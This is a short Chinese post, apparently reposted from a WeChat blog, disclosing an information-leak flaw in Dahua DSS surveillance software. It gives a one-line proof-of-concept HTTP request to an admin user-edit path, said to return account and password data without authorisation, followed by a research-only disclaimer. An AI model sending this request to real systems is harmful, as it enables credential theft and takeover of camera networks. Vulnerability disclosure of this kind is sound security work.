大华DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。
大华 DSS存在信息泄漏漏洞。攻击者可以利用这个漏洞获取到系统的账号和密码信息。这种未授权的信息访问可能导致攻击者完全控制受影响的系统,执行恶意操作、更改系统配置或获取其他敏感数据。
信息泄漏poc:
GET /admin/cascade_/user_edit.action?id=1
原文始发于微信公众号(丁永博的成长日记):大华DSS信息泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论